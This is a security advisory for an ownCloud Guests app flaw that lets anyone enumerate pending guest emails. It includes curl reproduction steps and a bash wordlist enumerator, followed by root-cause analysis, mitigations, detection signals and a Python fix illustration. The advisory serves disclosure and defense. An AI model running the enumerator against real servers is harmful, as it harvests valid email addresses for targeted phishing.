Type: Information Disclosure (User Enumeration)
CWE: CWE-200 (Exposure of Sensitive Information) / CWE-203 (Observable Discrepancy)
Affected component: ownCloud Guests app
Tested on: ownCloud Server 10.11, Guests app v0.12.4, Apache HTTPD
Researcher: Ali Firas (@thesmartshadow)
Date: 2025-11-03
An unauthenticated user can enumerate pending guest accounts by probing the registration endpoint and observing response differences when the email exists as a pending guest vs. when it does not. This leaks valid email addresses (PII), enabling targeted phishing/social engineering against legitimate invitees.
/apps/guests/register/{email}/{token}
The presence of a valid pending guest for {email} changes the server response even if the provided {token} is fake.
Affected Endpoint: /apps/guests/register/{email}/{token}
Code Path: apps/guests/lib/Controller/RegisterController.php::showPasswordForm()
Tested Versions: ownCloud Server 10.11 + Guests app 0.12.4
- ownCloud Server: 10.11
- Guests app: 0.12.4
- Web server: Apache
```bash
curl -i "http://<target>/apps/guests/register/nonexistent-user@example.com/123"
```

Expected/Observed: HTML response contains the string:

No such guest user
As an ownCloud admin, share any file/folder with test-guest@example.com.
This creates a pending guest entry with a registration token in the database.
```bash
curl -i "http://<target>/apps/guests/register/test-guest@example.com/123"
```

Observed:
- The password registration form is rendered.
- The page does not include the “No such guest user” error.
This discrepancy reveals that test-guest@example.com exists as a pending guest.
Provide a wordlist of candidate emails; the script flags addresses that resolve to a pending guest.
```bash
#!/usr/bin/env bash
# CVE-2025-59716 PoC enumerator
# Reads one candidate email per line from $WORDLIST and classifies each one by
# the response of the guest registration view when a fake token ("123") is sent.
TARGET="http://<target>"
WORDLIST="emails.txt"

while IFS= read -r EMAIL; do
    # Skip blank lines in the wordlist.
    [ -z "$EMAIL" ] && continue
    RESP=$(curl -sS "$TARGET/apps/guests/register/$EMAIL/123")
    if echo "$RESP" | grep -q "No such guest user"; then
        echo "[-] $EMAIL -> not found"
    elif echo "$RESP" | grep -qi "password" && echo "$RESP" | grep -qi "register"; then
        echo "[+] $EMAIL -> PENDING GUEST (leak)"
    else
        echo "[?] $EMAIL -> ambiguous response"
    fi
done < "$WORDLIST"
```

Notes: Adjust the two `grep` heuristics to match the exact templates/locale deployed by your target.
- PII leakage: discloses whether a given email is a valid pending guest.
- Enables spear‑phishing: attackers can target real invitees with convincing lures referencing the ongoing registration.
- Amplifies password attacks: knowledge of valid identities reduces guess space and can assist credential‑stuffing across ecosystems.
- CVSS v3.1 (example): AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N → Base 5.3 (Medium)
Adjust per your environment and disclosure policy.
Rendering logic for the /apps/guests/register/{email}/{token} route branches on whether {email} maps to a pending guest before token validation short-circuits the flow, so a request carrying a fake token still yields an observably different response for a pending email than for an unknown one.
- Uniform responses: return the same generic template/message regardless of whether {email} exists or is pending.
- Verify token first: fail fast on invalid/expired tokens before any email-existence-dependent branching.
- Rate limiting & logging: throttle repeated probes and surface signals for detection.
- Optional: CAPTCHA/secondary checks on anonymous registration views.
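The following is an added illustration of the root cause and of the first two mitigations above; it is not ownCloud's RegisterController code. The pending-guest table, the token check and the response strings are constructed stand-ins that model the two branching orders: existence check before token check (leaks), versus token check first with one generic failure message (does not leak).

```python
"""Added illustration of the observable-discrepancy root cause and the
uniform-response fix. Not ownCloud code: PENDING_GUESTS, the token check and
the response strings are constructed stand-ins for this example."""
import hmac

# Constructed stand-in for the pending-guest table (email -> registration token).
PENDING_GUESTS = {
    "test-guest@example.com": "a1b2c3d4e5f60718",
}

# Single message used for every failure path in the hardened handler.
GENERIC_ERROR = "This registration link is invalid or has expired."
PASSWORD_FORM = "<form>password registration form</form>"


def vulnerable_show_password_form(email: str, token: str) -> str:
    """Flawed order: the existence check runs, and emits its own message,
    before the token is verified. A caller holding a fake token therefore
    receives a different body depending on whether the email is pending."""
    if email not in PENDING_GUESTS:
        return "No such guest user"
    if not hmac.compare_digest(PENDING_GUESTS[email], token):
        return "Invalid token"  # a second distinct message: still distinguishable
    return PASSWORD_FORM


def _token_valid(email: str, token: str) -> bool:
    """Unknown email and wrong token collapse into the same outcome (False).
    compare_digest keeps the comparison constant-time for equal-length inputs."""
    expected = PENDING_GUESTS.get(email, "")
    return expected != "" and hmac.compare_digest(expected, token)


def hardened_show_password_form(email: str, token: str) -> str:
    """Verify the token first and render the same generic message for every
    failure, so nothing observable depends on whether the email exists."""
    if not _token_valid(email, token):
        return GENERIC_ERROR
    return PASSWORD_FORM


def leaks_existence(handler, pending_email: str, unknown_email: str,
                    fake_token: str = "123") -> bool:
    """True when the handler's response to a fake token differs between a
    pending email and an unknown one, i.e. the observable discrepancy exists."""
    return handler(pending_email, fake_token) != handler(unknown_email, fake_token)


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_show_password_form),
                          ("hardened", hardened_show_password_form)):
        result = leaks_existence(handler, "test-guest@example.com", "nobody@example.com")
        print(f"{name}: leaks existence = {result}")
```

The hardened handler only ever distinguishes "valid token for that email" from "anything else", which is the property a uniform-response fix has to preserve; a second distinct error string on the token path, as in the vulnerable model, reintroduces the leak even after the existence check is moved.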
- Web logs with a high rate of GET /apps/guests/register/*/* for diverse emails and a constant fake token.
- User-agent/IP patterns indicative of scripted enumeration.
- Template rendering metrics showing disproportionate hits to the registration page with invalid tokens.
- Reporter: Ali Firas (@thesmartshadow)
- CVE: CVE-2025-59716
- Classification: CWE-200, CWE-203
Disclaimer: This PoC is provided for defensive testing on systems you own or are authorized to assess.